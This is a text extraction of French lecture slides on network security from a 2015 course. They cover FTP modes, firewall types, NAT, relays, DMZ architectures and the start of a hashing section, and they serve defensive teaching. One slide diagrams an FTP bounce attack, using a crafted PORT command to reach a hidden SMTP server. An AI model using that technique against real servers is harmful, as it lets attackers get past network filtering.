Aléa 1 230 Guest Login OK 21
Aléa 1 PORT 1,2,3,4,X,Y 21
Aléa 1 200 Port OK 21
X*256+Y Etablissement de la connexion 20
Aléa 1 GET fichier 21
X*256+Y données du fichier 20

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 119 / 351


Protocole complexe FTP actif (flux)

Client : 1.2.3.4 Serveur : 5.6.7.8


Aléa 1 Etablissement de la connexion 21
Aléa 1 USER ANONYMOUS 21
Aléa 1 331 Enter Password 21
Aléa 1 PASS TOTO@CLIENT.FR 21
Aléa 1 230 Guest Login OK 21
Aléa 1 PORT 1,2,3,4,X,Y 21
Aléa 1 200 Port OK 21
X*256+Y Etablissement de la connexion 20
Aléa 1 GET fichier 21
X*256+Y données du fichier 20

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 120 / 351


Protocole complexe FTP passif

Client : 1.2.3.4 Serveur : 5.6.7.8

Aléa 1 Etablissement de la connexion 21


Aléa 1 USER ANONYMOUS 21
Aléa 1 331 Enter Password 21
Aléa 1 PASS TOTO@CLIENT.FR 21
Aléa 1 230 Guest Login OK 21
Aléa 1 PASV 21
Aléa 1 227 Passive 5,6,7,8,X,Y 21
Aléa 2 Etablissement de la connexion X*256+Y
Aléa 1 GET fichier 21
Aléa 2 données du fichier X*256+Y

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 121 / 351


Protocole complexe FTP passif (flux)

Client : 1.2.3.4 Serveur : 5.6.7.8


Aléa 1 Etablissement de la connexion 21
Aléa 1 USER ANONYMOUS 21
Aléa 1 331 Enter Password 21
Aléa 1 PASS TOTO@CLIENT.FR 21
Aléa 1 230 Guest Login OK 21
Aléa 1 PASV 21
Aléa 1 227 Passive 5,6,7,8,X,Y 21
Aléa 2 Etablissement de la connexion X*256+Y
Aléa 1 GET fichier 21
Aléa 2 données du fichier X*256+Y

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 122 / 351


Attaques protocolaires : FTP

Pirate Serveur FTP Serveur SMTP


1.2.3.4 5.6.7.8 "caché"
9.8.7.6
Aléa 1 PORT 9,8,7,6,0,25 21 25
Aléa 1 200 Port OK 21 25
Aléa 1 20 25
Aléa 1 20 25

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 123 / 351


Les pare-feux

Les filtres de paquets


Les stateful
Les deep inspection
Les IPS

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 124 / 351


Les pare-feux

Sont placés en ”coupure” du réseau


Coupent la communication ou la laissent passer sans la
modifier
Ne nécessitent pas de configurer les machines ou les logiciels

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 125 / 351


Filtre de paquets : Définition

Décide du passage de chaque paquet sans le replacer dans le


contexte
Suivant les critères du paquet
Source,destination
Options IP,ICMP,UDP,TCP(ACK,SYN,etc ...)
Suivant des critères extérieurs (rares)
heure, charge, etc...

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 126 / 351


Formalisation

Source : machine qui envoie le paquet


C’est le début de la flèche (cf schéma)
Destination : machine à qui le paquet est envoyé.
C’est la pointe de la flèche.
Source/Destination notion différente de Client/Serveur
Inscrit dans l’en-tête IP des paquets.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 127 / 351


Filtre de paquets : Avantages

Le plus rapide, il peut même être placé sur


Des Network processeurs
Des FPGA
des ASICs
Le plus simple à installer
Très efficace pour des séparations de réseaux

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 128 / 351


Filtre de paquets : Inconvénients

Règles peu lisibles


Règles nombreuses ( plusieurs centaines)
Certains filtrages sont compliqués et imparfaits
FTP
RPC
Ne comprend pas du tout la connexion

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 129 / 351


Filtre de paquets : Trucs

Toujours définir une règle par défaut


elle existe toujours, mais il faut la définir
Optimisation de la vitesse :
règle de passage générale des paquets acquittés (75%)
Gestion des ICMP
(unreachable, etc ...) : ne pas les renvoyer
Définir les règles sur une autre machine

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 130 / 351


Filtre de paquets : Trucs 2

Préférer les noms de machines dans la conception des règles


Préférer les adresses IP dans les règles
Utiliser un générateur de règles
Evite les erreurs bêtes

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 131 / 351


Filtre de paquets : Questions à poser

Ordre des règles :


Séquentiel
A précision décroissante
A branchement
Arrêt sur correspondance (on match) ?
Filtres entrée et sortie ?
Pare-feu auto-protégé
Filtre indépendant sur chaque interface ?

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 132 / 351


Filtre de paquets : Questions à poser.

Possibilité de mettre des filtres sur des options du paquet


Filtrage sur le port
Capacité de journalisation
Vitesse annoncée pour quelles conditions ? Quasiment toujours
pour
2 machines
1 seule règle (ACCEPT)
1 protocole simple
Gestion des Vlans

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 133 / 351


Filtrage séquentiel

Règle 1
Règle 2
Règle 3
Règle 4
Règle 5
Règle 6
Règle 7
Règle 8
Règle 9
Règle 10
Règle 11
Règle 12
Règle 13
Règle 14
Règle 15 Pas d ’arrêt sur correspondance

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 134 / 351


Filtrage par ordre de précision

Règle 1 Règle 2
Règle 2 Règle 4
Règle 3 Règle 6
Règle 4 Règle 7
Règle 5 Règle 5
Règle 6 Règle 3
Règle 7 Règle 1
192.168.0.0/16 ==> 10.0.0.0 PAS OK 192.168.1.0/24 ==> 10.0.0.0 OK
192.168.1.0/24 ==> 10.0.0.0 OK 192.168.0.0/16 ==> 10.0.0.0 PAS OK

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 135 / 351


Filtrage par branchement

Règle 1
Règle 2 Règle 2.1
Règle 2.2
Règle 2.3
Règle 2.4
Règle 3
Règle 4
Règle 5 Règle 5.1
Règle 5.2 Correspondance
Règle 5.3
Règle 6
Règle 7
Règle 8 Règle 8.1
Règle 8.2
Règle 8.3

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 136 / 351


Filtre de paquets : Options courantes

Limitation de débit
Eviter les abus internes
Limiter les rebonds de flooding
Journalisation
du refus
des paquets refusés

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 137 / 351


Filtre de paquets : Exemples

IOS cisco
Filtre commutateurs et routeurs
Iptables (mais peut faire mieux)
Pktfilter sur windows 2K/XP/2003
De manière générale : tout filtre accéléré par ASIC

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 138 / 351


Filtre de paquets : Principe de Netfilter

Interface(s)
Interface(s)
FORWARD

User-defined
INPUT OUTPUT
User-defined

Processus

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 139 / 351


Filtre de paquets : exercices

Filtrage en entrée
Autorisez du ssh, puis du ftp passif et du ftp actif

Filtrage en sortie
Autorisez du ssh, puis du ftp actif et du ftp passif

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 140 / 351


Pare-feu stateful inspection

Pourquoi un pare-feu à gestion d’états


Pare-feu filtrant insuffisant
Trop grande ouverture de ports
Idée de conserver l’état de la connexion
Apparition de besoins de NAT

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 141 / 351


Pare-feu Stateful : Définition

Stateful, Stateful Inspection


Gère les différents états de la connexion (début,milieu,fin)
Ressemble au SYN, SYN-ACK, ACK de TCP. Mais pas tout à
fait
Fait de même avec UDP (Travaille sur les ports et le timeout)
Un critère de filtrage apparaı̂t : l’état.
C’est la seule définition !
Recouvre plusieurs réalités

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 142 / 351


Pare-feu Stateful : TCP

Serveur IP-S
Port-S Critère d ’état, Timeout
Paquet 1
IP-C:P-C / IP-S:P-S / NEW / 29
Paquet 2 IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /
Paquet 3 IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /

Communication

Paquet 1500 IP-C:P-C / IP-S:P-S / ESTABLISHED / 179


Paquet 1501 IP-C:P-C / IP-S:P-S / ESTABLISHED / 179
Rien pendant 300 sec
RIEN ==> Timeout
Paquet 1502
IP-C:P-C / IP-S:P-S / NEW / 29

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 143 / 351


Pare-feu Stateful : UDP

Client IP-C Serveur IP-S


Port-C Port-S Critère d ’état, Timeout
Paquet 1
IP-C:P-C / IP-S:P-S / NEW / 29
Paquet 2 IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /
Paquet 3 IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /

Communication

Paquet 1500
IP-C:P-C / IP-S:P-S / ESTABLISHED / 179
Paquet 1501
IP-C:P-C / IP-S:P-S / ESTABLISHED / 179
Rien pendant 300 sec
RIEN ==> Timeout
Paquet 1502
IP-C:P-C / IP-S:P-S / NEW / 29

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 144 / 351


Plus simplement

Le fils va dehors avec un seau d’eau => NEW


La fille cours après son frère, trempée => ESTABLISHED
Course poursuite => ESTABLISHED
Ils font la paix => FIN
L’un d’eux se casse la figure => RST
Ils arrêtent pendant 15 minutes => TIMEOUT

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 145 / 351


Pare-feu stateful : définition (2)

Les meilleurs stateful analysent le contenu (STIC)


Les filtres sont donc dynamiques
Rares sont les STIC qui font tous les protocoles
Certains n’analysent pas du tout le contenu (STI)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 146 / 351


Pare-feu Stateful : FTP

Client IP-c Serveur IP-S


Port-C port 21
SYN (1000)
IP-C:P-C / IP-S:21 / NEW / 29
SYN (2000),ACK(1001) IP-C:P-C / IP-S:21 / ESTABLISHED / 29
ACK(2001) IP-C:P-C / IP-S:21 / ESTABLISHED / 890

Communication Etablie

PORT, IP-C,P-C2
IP-C:P-C / IP-S:P-S / ESTABLISHED / 890
200 PORT OK
IP-C:P-C2 / IP-S:20 / RELATED / 890

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 147 / 351


Pare-feu Stateful : Avantages

Rapide (mais l’analyse du contenu ralentit légèrement)


Plus précis et donc plus efficace (STIC)
Règles plus simples (STIC)
Règles moins nombreuses (STIC)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 148 / 351


Pare-feu Stateful : Inconvénients

Attention, l’analyse de contenu n’est pas toujours présente


Ne comprend pas la communication
Tous les protocoles ne peuvent pas passer (X11)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 149 / 351


Pare-feu Stateful : Questions à poser

Idem filtre de paquets


STIC ou STI ?
Quels protocoles sont supportés ?
Ajout de nouveaux protocoles
Gestion des N° de séquence ?
Vitesse annoncée pour quelle protection ?
Attention aux optimisations sur le matériel

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 150 / 351


Pare-feu Stateful : Options courantes

Les mêmes qu’avec les filtres de paquets


Plugin vers des fonctions évoluées
Filtrage d’URL (STIC) par CVP
Lutte antivirale (STIC) par CVP
Plugin vers des relais applicatifs
Authentification sur certains protocoles
Le NAT
Le Tarpit

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 151 / 351


Pare-feu Stateful : Exemples

Checkpoint Firewall-1 (STIC)


Netfilter (IPTables) de Linux (STIC)
IOS Firewall de CISCO (STIC)
Clavister (STI)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 152 / 351


Pare-feu Stateful : Le NAT

Network Address Translation


Modification de l’adresse visible d’une machine interne (IP-e
au lieu de IP-i)
Deux buts
Pallier à un manque d’adresses (utilisation des RFC3330)
Cacher pour protéger
De nombreuses manières de l’implémenter

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 153 / 351


Pare-feu Stateful : le NAT : le SNAT

Source Network Address Translation


On change l’adresse du client
C’est l’utilisation principale
Permet d’avoir un grand nombre d’adresses IP

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 154 / 351


Pare-feu Stateful : le NAT : le SNAT

Externe Interne
123.45.67.89:80  10.1.1.2:3456
123.45.67.89:80  12.1.1.4:3456

123.45.67.89:80  12.1.1.4:3456
123.45.67.89:80  10.1.1.2:3456
Client C1
Serveur S1

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 155 / 351


Pare-feu Stateful : le NAT : le DNAT

Destination Network Address Translation


Plus rarement utilisée
Pour des serveurs en DMZ
Pour des serveurs derrière une adresse unique
Permet un pseudo équilibrage de charge
Peut-être utilisé pour des processus de diversion

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 156 / 351


Pare-feu Stateful : le NAT : le DNAT

Externe Interne
123.45.67.89:3456  12.1.1.4:80
123.45.67.89:3456  10.1.1.2:80

123.45.67.89:3456  10.1.1.2:80
123.45.67.89:3456  12.1.1.4:80

Client C1 Serveur S1

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 157 / 351


Pare-feu Stateful : le NAT dynamique

L’adresse visible fait partie d’un pool


Généralement dans le cas d’un SNAT
Pool-e < Pool-i
La correspondance IP-e et IP-i est variable dans le temps (à la
DHCP)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 158 / 351


Pare-feu Stateful : le NAT dynamique

Externe Interne
123.45.67.89:80  10.1.1.2:3456
123.45.67.89:80  12.1.1.4:3456

123.45.67.89:80  12.1.1.4:3456
123.45.67.89:80  10.1.1.2:3456

Serveur S1 Client C1
11.11.11.11 :80  10.1.1.4:6789
11.11.11.11:80  12.1.1.5:6789

11.11.11.11 :80  12.1.1.5:6789


11.11.11.11 :80  10.1.1.4: 6789

Serveur S2 Pare-feu Client C2

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 159 / 351


Pare-feu Stateful : le NAT : le SAT

Static Address Translation


La correspondance IP-e et IP-i est constante
Réservé à des serveurs accessibles : DNAT
Pour les clients si Pool-e = Pool-i

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 160 / 351


Pare-feu Stateful : le NAT : le PAT

PAT : Port Address translation


Correspond à la quasi totalité des NAT grand public
Dans le cas où Pool-e = 1
On est obligé de changer le port source pour différencier les
machines
Appelé aussi mascarade
Peut-être utilisé en complément des autres méthodes

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 161 / 351


Pare-feu Stateful : le NAT : le PAT

Externe 123.45.67.89:80  10.1.1.2:3456


Interne
123.45.67.89:80  12.1.1.3.8001

123.45.67.89:80  12.1.1 .3.8001


123.45.67.89:80  10.1.1.2:3456

Serveur S1 Client C1
11.11.11.11 :80  10.1.1.4:6789
11.11.11.11:80  12.1.1.3.8002

11.11.11.11 :80  12.1.1.3.8002


11.11.11.11 :80  10.1.1.4: 6789

Serveur S2 Pare-feu Client C2

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 162 / 351


Pare-feu Stateful : le NAT : problème
Les mêmes que le Stateful : où se fait le changement ?
En-têtes IP, TCP et UDP (STI)

Externe Interne
123.45.67.89:21  12.1.1.3:8001 123.45.67.89:21  10.1.1.2:3456

CMD : « port 10,1,1,2,6789 » CMD : « port 10,1,1,2,6789 »

123.45.67.89:20  10,1,1,2,6789

10.1.1.2
!!!

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 163 / 351


Pare-feu Stateful : le NAT : solution
On ne se limite plus aux en-têtes
En-têtes IP, TCP et UDP (STI)
Et on ajoute :
Modification dans les messages

Externe Interne
123.45.67.89:21  12.1.1.3:8001 123.45.67.89:21  10.1.1.2:3456

CMD : « port 12,1,1,3,8002 » CMD : « port 10,1,1,2,6789 »

123.45.67.89:20  12.1.1.3:8002 123.45.67.89:80  10.1.1.2:6789

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 164 / 351


NAT et Filtrage : Netfilter

Interface(s) Interface(s)
PREROUTING FORWARD POSTROUTING

User-defined
INPUT OUTPUT
User-defined

Processus

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 165 / 351


Pare-feu deep-inspection

Terme à relent marketing


Evolution du stateful inspection
Vérifie la conformité aux RFC
A la limite du relais applicatifs (cf suite)
Mais est-ce différent des IPS ?
Concurrencé par la Firewall NG ”Next Generation”

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 166 / 351


Pare-feu Next-Generation

Terme à relent marketing


Evolution du stateful inspection
utilisation de paramètres supplémentaires
l’identité de la personne
l’application (et non plus le port), surtout que tout passe par le
80.
Facebook
Gmail
GoogleDrive

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 167 / 351


Pare-feu Next-Generation

Recouvre beaucoup de réalités


Comment se fait la détection de la personne
Par remontée de l’authentification AD ?
Par l’installation d’un client ?
Comment-est utilisée cette authentification ?
Une personne <=> 1 IP ?
Une communication <=> 1 personne ?
Est-ce dynamique ?
Comment sont détectées les applications ?
par schéma ? (donc abonnement ?)
par url ?
par IP ?

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 168 / 351


Pare-feu NG : avantages

Simplicité de la maintenance (changement d’IP = pas de


changement de droit)
On sait QUI a accès.
On devient très fin dans le filtrage.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 169 / 351


Pare-feu NG : inconvénients

Incompatible avec du ”wirespeed” (reconstitution des paquets)


Ne pourra jamais aller aussi loin qu’un relais applicatif
Dégâts collatéraux

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 170 / 351


Pare-feu NG : acteurs

Palo Alto
iptables + L7 Filter + NuFW (UFWi)
Maintenant tout FW est forcément NG.....

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 171 / 351


Les I.P.S.

Intrusion Prevention System


Encore un niveau supplémentaire vis-à-vis du deep-inspection
Réassemble les paquets
Normalise les communications
Vérifie la conformité aux RFC
Les compare à une base d’attaque
C’est un routeur qui fait de la détection d’intrusion et qui
agit : IDS (Intrusion Detection System) n’était pas assez
vendeur

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 172 / 351


Protection IPS : Avantages

Peut protéger d’attaques très sophistiquées


Ne nécessite pas de modification d’architecture ou des clients
Parfois inattaquable car indétectable (pas d’adresse IP)
Peut couper ou limiter des flux interdits

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 173 / 351


Protection IPS : Inconvénients

Plus lent encore que le deep inspection (comparaison de


schémas)
Demande une machine adaptée au débit pour des coupures
complexes
Dégâts collatéraux plus nombreux que le deep inspection

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 174 / 351


Protection IPS : Exemples

NetASQ
Tippingpoint
Snort Inline
Guardian pour iptables
Iptables et module string
Hogwash
Dsniff
Hunt, Juggernaut, Couic

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 175 / 351


Protection IPS : Inconvénients

Plus lent encore que le deep inspection (comparaison de


schémas)
Demande une machine adaptée au débit pour des coupures
complexes
Dégâts collatéraux plus nombreux que le deep inspection

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 176 / 351


Protection IPS : Questions à poser

Nombre de règles
Mise à jour des règles (qui, d’où)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 177 / 351


Les boites noires

Les firewall tout faits :


Ont un OS
CISCO IOS-XR => QNX Neutrino
Juniper JunOS => FreeBSD 4.10
Alcatel TimOS => VXWorks
Huawei VRP => VXWorks
NetASQ => FreeBSD
Arkoon => Linux
SideWinder => Linux (SeLinux)
Sont parfois aidés de composants

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 178 / 351


Boites noires et circuits

L’aide hardware est précieuse


Plus rapide
Moins chère
Moins consommatrice
Mais elle pose des problèmes
ASICs : rapides, économiques mais fixes et peu intelligents
FPGA : assez rapides, modifiables mais peu intelligents
Network processors : intelligents, relativement rapides mais
gourmands et chers

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 179 / 351


Les relais

Après les douves, les ponts

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 180 / 351


Relais : Définition

Les relais travaillent sur le passage et non la coupure


Le principe est : ”laisse faire un professionnel.”
Ils dissimulent le client (authentification externe par l’adresse
IP)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 181 / 351


Relais : Définition (2)

Réseaux & serveurs Réseaux locaux


distants
Relais

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 182 / 351


Relais : Définition (3)
Si on ne coupe pas :

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 183 / 351


Relais : Définition (4)

Relais R

R-S
Règles Serveur S

C-R Accepte
Décision
Port
du
relais R-S2
Machine Redirige
cliente C

Interdit Serveur S2
Logs

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 184 / 351


Les relais génériques

La standardiste
C’est un relais générique
Généralement placé au niveau circuit (TCP ou UDP)
La communication C-R encapsule la communication C-S.
Le client demande au relais une communication à l’extérieur
Autorisation basée sur
l’origine (machine, port)
la destination (machine, port)
l’identification ou l’authentification du client pour tout
protocole

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 185 / 351


Relais circuit : Avantages

Laisse passer beaucoup de protocoles


Permet de bloquer
Sur l’origine et la destination
L’identité de l’utilisateur
Journalise
Les protagonistes (leur IP, leur port)
Taille, durée, identité, etc..
Simplicité du serveur
Règles simples
Simplicité du client
Un paramétrage une fois pour toutes

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 186 / 351


Relais circuit : Inconvénients

Lent
Tous les protocoles ne passent pas
Ne comprend pas la communication
Nécessite l’installation d’une partie cliente
Intégrée dans les outils
Intégrée dans le système par des librairies
Empêche la notion de serveur

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 187 / 351


Relais circuit : Trucs

Différencier relais d’entrée et relais de sortie


Les relais de sortie doivent refuser l’entrée
Préférer les relais applicatifs si possible

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 188 / 351


Relais circuit : Options courantes

Chiffrement entre le client et le relais


Authentification
Tunneling

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 189 / 351


Relais circuit : Exemples

Un seul exemple définit par une RFC (dite AFT advanced


Firewall Traversal)
Les socks
Plusieurs implémentations (dont certaines gratuites)
Nec (serveur et client)
Hummingbird (client)
Dante (serveur et client unix)
Msproxy (en partie)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 190 / 351


Les relais applicatifs

Les relais applicatifs

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 191 / 351


Relais applicatifs : Définition

Le client fait une demande de connexion au relais dans le


même protocole
Le relais traite la demande et la retransmet au serveur
Il renvoie la réponse au client
La communication C-R est conforme au protocole relayé
R comprend la communication
R peut intervenir dans la communication
Squid : accélération, transforme les urls, etc.
Sendmail/Postfix : ajoutent des entêtes

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 192 / 351


Relais applicatifs : Avantages

Compréhension totale du protocole


Filtrage extrêmement fin
Journalisation complète
Protection plus efficace
Authentification facilement intégrable
Nombreuses fonctionnalités complémentaires
Parfois seul moyen de passer (X11)
Utilisés en relais d’entrée, ils protègent efficacement les
serveurs

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 193 / 351


Relais applicatifs : Inconvénients

Il faut un relais par protocole


Il y a peu de protocoles relayés
C’est le plus lent des relais
Consommateur de CPU
Plus complexe, et donc plus vulnérable
Chaque logiciel doit-être configuré (sauf si redirection
transparente)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 194 / 351


Relais applicatifs : options courantes

Lutte antivirale
Filtrage d’action (put, get pour le ftp)
Filtrage d’URLs
Cache (optimisation du trafic)
Authentification

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 195 / 351


Relais applicatifs : Trucs

Penser à empêcher l’entrée par leur biais


Attention aux modules génériques qui n’ont pas les avantages
des relais applicatifs (voir relais circuit)
Ne pas croire qu’ils sont la panacée ! ! (httptunnel)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 196 / 351


Relais applicatifs : Exemples

Squid (http, https, ftp)


Fwtk (http, ftp, telnet, X11, rlogin, pop, sqlnet générique
(TCP)). Mais ne bouge plus depuis plusieurs années.
Serveurs SMTP, DNS, NTP (par définition)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 197 / 351


Relais applicatifs : Exercice

Installation d’un relais Squid + SquidGuard


Apt-get install squid
Apt-get install squidGuard
Apt-get install chastity-list
Squid.conf (url rewrite program /usr/bin/squidGuard -c
/etc/chastity/squidGuard-chastity.conf)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 198 / 351


Le mélange des genres

Complémentarité visible
Quelques pare-feu intègrent 2 processus
Filtrage stateful qui renvoie vers
des Relais applicatifs transparents

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 199 / 351


Choix entre ces 4 (5) types

Dépend
De la sécurité exigée
De la vitesse nécessaire
Du budget disponible
Des exigences des utilisateurs
Rarement limité à un seul type
Ils sont très complémentaires.
Les relais ne sont rien sans des interdictions

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 200 / 351


Les astuces générales

Utiliser un serveur Syslog centralisé


Synchroniser les horloges par NTP
Bien segmenter son réseau (règles simples)
Eviter de nuire aux utilisateurs ! ! ! !

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 201 / 351


Pare-feu : le faire soi-même

Choisir un OS bien maı̂trisé


Ne PAS ENCORE LE CONNECTER
Partitionner correctement le disque (/var)
Patcher l’OS et les logiciels
Pas de compte utilisateur
Enlever les services non indispensables
Faire une synchronisation NTP du PF

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 202 / 351


Pare-feu : le faire soi-même : mode paranoiaque

Limitez les logiciels


chroot et chuid des processus (UNIX)
Un uid par processus
Application de patch noyaux durcis
grsecurity http://www.grsecurity.net
openwall http://www.openwall.com
Selinux

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 203 / 351


Pare-feu : le faire soi-même : mode paranoiaque

Mettre ce qui possible en immuable


chmod +t en unix
monter les partitions en Read Only
Faire une empreinte du système
Tripwire http://www.tripwire.org

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 204 / 351


Les architectures

Les architectures

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 205 / 351


Les architectures disponibles

Leur fonctionnement dépend des pare-feux utilisés


Les architectures dépendent
Du budget
Du temps disponible
Des compétences locales
Des choix de la politique de sécurité

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 206 / 351


Bastion externe

Réseau extérieur

Pare-feu

Ressources privées

Ressources publiques

Zone dangereuse

Zone semi-protégée

Zone protégée

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 207 / 351


Bastion externe

Les plus
Protège tout le réseau
L’accès aux serveurs publics est rapide
Les moins
Si le serveur public est compromis ....
Si le PF est compromis ....

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 208 / 351


Bastion interne

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 209 / 351


Bastion interne

Les plus
Si les serveurs publics compromis => PF
Les moins
Les serveurs publics sont moins accessibles
Si le PF est compromis ....

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 210 / 351


DMZ ou Zone Semi-Ouverte

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 211 / 351


DMZ

Les plus
Tout le réseau est protégé
Si serveurs publics compromis => PF2
Si PF1 compromis => PF2
Les moins
Les serveurs publics sont moins accessibles (sauf si PF2
filtrant)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 212 / 351


DMZ : PF à interfaces multiples

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 213 / 351


DMZ : PF à interfaces multiples

Les plus
Moins cher
Plus facile à administrer
Même technologie pour toutes les DMZ
Les moins
Si PF compromis ...
Règles plus complexes

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 214 / 351


DMZ : compléments

Combien de DMZ ?
1 pour les serveurs publics
1 pour les entrées
1 pour les sorties
....

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 215 / 351


Architecture : choix à effectuer

Quels sont les types de PF utilisés ?


Les clients internes sortent-ils directement ?
Plus souple, plus rapide, moins sûr
Les clients sont-ils obligés de ”relayer”?
Plus sûr, moins rapide, moins souple

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 216 / 351


Architecture : trucs

Mettre un serveur syslog à l’intérieur


Empêcher le DNS de résoudre les adresses IP internes pour
l’extérieur
Les serveurs publics sont des semi-copies de serveurs internes
LDAP, Web, etc..

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 217 / 351


Critères de choix

Pas de ”meilleur” pare-feu, uniquement un plus adapté que les


autres.
Position dans l’organisme (en entrée, devant un laboratoire)
Hiérarchie des priorités
Vitesse
Protection entrante
Protection sortante

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 218 / 351


Définir ses besoins :Quel trafic ?

Faire une analyse de trafic


Mettre un NIDS
Analyser les attaques
Permet de justifier des budgets (surtout s’il y a de beaux
graphiques)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 219 / 351


Vérifier son pare-feu

NMAP
Services visibles par un pirate
Filterrules
Analyse des filtres réellement en place
NIDS après le PF
Vérifie que rien ne passe.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 220 / 351


Gérer son pare-feu

Configurer
Interface graphique ?
Console ?
A distance ?
Console d’administration centrale
Par telnet ou ssh
Sur la console ?

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 221 / 351


Pare-feu : l’arme absolue ?

Avez-vous vu passer NIMDA ?


Compléments indispensables
IDS et NIDS
Anti-Virus
Suivre l’actualité sécuritaire
Problèmes de légalité

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 222 / 351


Le chiffrement

Le Chiffrement

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 223 / 351


Le chiffrement

Les condensats (Hash)


La signature
Le chiffrement symétrique
Le chiffrement asymétrique
Les certificats

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 224 / 351


Hashage : définition

Transformation d’une suite d’octets de longueur généralement


quelconque en une suite de longueur finie,
Souvent appelé ”condensat”,
Génère une ”empreinte” pseudo-unique,
Cette opération est constante (même fichier, même hash),
Cette opération est non réversible.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 225 / 351


Hashage : utilité

